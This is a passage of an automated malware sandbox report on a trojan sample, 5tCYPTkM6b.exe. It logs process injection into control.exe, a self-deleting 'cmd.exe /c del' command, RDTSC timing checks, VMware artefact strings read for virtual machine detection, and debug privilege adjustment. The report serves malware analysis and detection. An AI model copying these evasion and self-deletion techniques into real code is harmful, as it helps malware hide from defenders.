          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04399A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04399A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04399B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0439A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_001E85F0 NtCreateFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_001E86A0 NtReadFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_001E8720 NtClose,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_001E87D0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_001E85EA NtCreateFile,
          Source: 5tCYPTkM6b.exe, 00000000.00000003.268713212.000000001B1CF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 5tCYPTkM6b.exe
          Source: 5tCYPTkM6b.exe, 00000000.00000003.266191041.000000001B036000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 5tCYPTkM6b.exe
          Source: 5tCYPTkM6b.exe, 00000002.00000002.332790089.0000000000ABF000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 5tCYPTkM6b.exe
          Source: 5tCYPTkM6b.exe, 00000002.00000002.332526173.0000000000955000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCONTROL.EXEj% vs 5tCYPTkM6b.exe
          Source: 5tCYPTkM6b.exe, 00000002.00000002.333320879.0000000000C4F000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 5tCYPTkM6b.exe
          Source: 5tCYPTkM6b.exeVirustotal: Detection: 39%
          Source: 5tCYPTkM6b.exeReversingLabs: Detection: 34%
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeFile read: C:\Users\user\Desktop\5tCYPTkM6b.exeJump to behavior
          Source: 5tCYPTkM6b.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\5tCYPTkM6b.exe "C:\Users\user\Desktop\5tCYPTkM6b.exe"
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeProcess created: C:\Users\user\Desktop\5tCYPTkM6b.exe "C:\Users\user\Desktop\5tCYPTkM6b.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\5tCYPTkM6b.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeProcess created: C:\Users\user\Desktop\5tCYPTkM6b.exe "C:\Users\user\Desktop\5tCYPTkM6b.exe"
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\5tCYPTkM6b.exe"
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeFile created: C:\Users\user~1\AppData\Local\Temp\nsiD4B2.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/4@11/3
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 0_2_00402012 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 0_2_00404275 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6988:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Binary string: wntdll.pdbUGP source: 5tCYPTkM6b.exe, 00000000.00000003.267437661.000000001B0B0000.00000004.00000800.00020000.00000000.sdmp, 5tCYPTkM6b.exe, 00000000.00000003.264871766.000000001AF20000.00000004.00000800.00020000.00000000.sdmp, 5tCYPTkM6b.exe, 00000002.00000002.332790089.0000000000ABF000.00000040.00000800.00020000.00000000.sdmp, 5tCYPTkM6b.exe, 00000002.00000002.332546161.00000000009A0000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000E.00000003.334008082.0000000004190000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000E.00000002.524788773.000000000444F000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000E.00000002.524438150.0000000004330000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: control.pdb source: 5tCYPTkM6b.exe, 00000002.00000002.332518293.0000000000950000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: 5tCYPTkM6b.exe, 5tCYPTkM6b.exe, 00000002.00000002.332790089.0000000000ABF000.00000040.00000800.00020000.00000000.sdmp, 5tCYPTkM6b.exe, 00000002.00000002.332546161.00000000009A0000.00000040.00000800.00020000.00000000.sdmp, control.exe, control.exe, 0000000E.00000003.334008082.0000000004190000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000E.00000002.524788773.000000000444F000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000E.00000002.524438150.0000000004330000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: control.pdbUGP source: 5tCYPTkM6b.exe, 00000002.00000002.332518293.0000000000950000.00000040.10000000.00040000.00000000.sdmp
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_0041B832 push eax; ret
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_0041B83B push eax; ret
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_004160CB push edx; ret
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_0041B8D6 push ebp; ret
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_0041B8F3 push ebp; ret
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_0041B89C push eax; ret
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_0041C134 push ebp; ret
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00407265 push cs; iretd
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_004152C7 push edx; retf
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_0041537D push ebp; retf
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_0041C5DD push ebp; ret
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00415F76 push ds; iretd
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_0041B7E5 push eax; ret
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00408783 push ecx; iretd
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A1D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043AD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_001EB83B push eax; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_001EB832 push eax; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_001EB89C push eax; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_001EB8D6 push ebp; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_001E60CB push edx; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_001D7265 push cs; iretd
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_001E52C7 push edx; retf
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_001E537D push ebp; retf
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_001E5F76 push ds; iretd
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_001D8783 push ecx; iretd
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_001EB7E5 push eax; ret
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 0_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeFile created: C:\Users\user\AppData\Local\Temp\nsiD4B4.tmp\npsx.dllJump to dropped file

          Hooking and other Techniques for Hiding and Protection

          Source: C:\Windows\SysWOW64\control.exe | Process created: /c del "C:\Users\user\Desktop\5tCYPTkM6b.exe"
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\control.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | RDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | RDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exe | RDTSC instruction interceptor: First address: 00000000001D8614 second address: 00000000001D861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exe | RDTSC instruction interceptor: First address: 00000000001D89AE second address: 00000000001D89B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\explorer.exe TID: 5672 | Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\SysWOW64\control.exe TID: 7144 | Thread sleep time: -34000s >= -30000s
          Source: C:\Windows\explorer.exe | Last function: Thread delayed
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Code function: 2_2_004088E0 rdtsc
          Source: C:\Windows\SysWOW64\control.exe | API coverage: 9.7 %
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Code function: 0_2_00405D7C FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Code function: 0_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Code function: 0_2_00402630 FindFirstFileA,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | API call chain: ExitProcess graph end node
          Source: explorer.exe, 00000004.00000000.281905557.0000000008C73000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.302266423.0000000008A32000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000004.00000000.302266423.0000000008A32000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000004.00000000.281437629.0000000008B88000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.281437629.0000000008B88000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
          Source: explorer.exe, 00000004.00000000.297278556.00000000048E0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.281437629.0000000008B88000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
          Source: explorer.exe, 00000004.00000000.315675914.0000000008ACF000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
          Source: explorer.exe, 00000004.00000000.315675914.0000000008ACF000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000004.00000000.299091011.00000000069DA000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware SATA CD002
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Code function: 0_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Code function: 2_2_004088E0 rdtsc
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\control.exe | Process token adjusted: Debug
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Code function: 0_2_021E0402 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Code function: 0_2_021E0616 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Code function: 0_2_021E0706 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Code function: 0_2_021E0744 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Code function: 0_2_021E06C7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Code function: 2_2_00A090AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Code function: 2_2_009C9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Code function: 2_2_009FF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Code function: 2_2_009FF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Code function: 2_2_00A43884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Code function: 2_2_00A5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Code function: 2_2_00A5B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Code function: 2_2_00A47016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Code function: 2_2_009DB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Code function: 2_2_00A94015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Code function: 2_2_00A82073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Code function: 2_2_00A91074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Code function: 2_2_009FA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Code function: 2_2_009EC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Code function: 2_2_009CB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Code function: 2_2_009C9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Code function: 2_2_009F513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Code function: 2_2_009E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Code function: 2_2_009E4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Code function: 2_2_009EB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Code function: 2_2_009CB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Code function: 2_2_009FD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Code function: 2_2_009C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Code function: 2_2_00A7B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Code function: 2_2_00A98A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Code function: 2_2_00A0927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Code function: 2_2_009C9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Code function: 2_2_00A95BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Code function: 2_2_009D1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Code function: 2_2_00A8138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Code function: 2_2_00A7D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Code function: 2_2_00A8131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Code function: 2_2_009CF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Code function: 2_2_009CDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Code function: 2_2_00A98B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Code function: 2_2_009CDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Code function: 2_2_00A814FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Code function: 2_2_00A98CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Code function: 2_2_00A9740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Code function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Code function: 2_2_009FBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Code function: 2_2_009E746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Code function: 2_2_00A5C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Code function: 2_2_009FFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Code function: 2_2_009C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Code function: 2_2_009F35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Code function: 2_2_00A78DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Code function: 2_2_00A98D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Code function: 2_2_009F4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Code function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009CAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009E7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A03D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A43540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009EC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009EC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A446A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A90EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A90EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A90EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A5FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009F36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A7FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009F16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A98ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009D76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A7FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009CC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009CC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009CC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009CE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009D766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A9070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A9070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009FE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009C4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009C4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A5FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A5FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A98F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009DEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0438BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043D6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043D6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043D6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043D6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04411C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04411C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04411C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04411C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04411C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04411C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04411C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04411C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04411C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04411C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04411C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04411C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04411C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04411C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0442740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0442740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0442740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0437746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043EC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043EC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0438A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04428CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0436849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_044114FB mov eax, dword ptr fs:[00000030h]
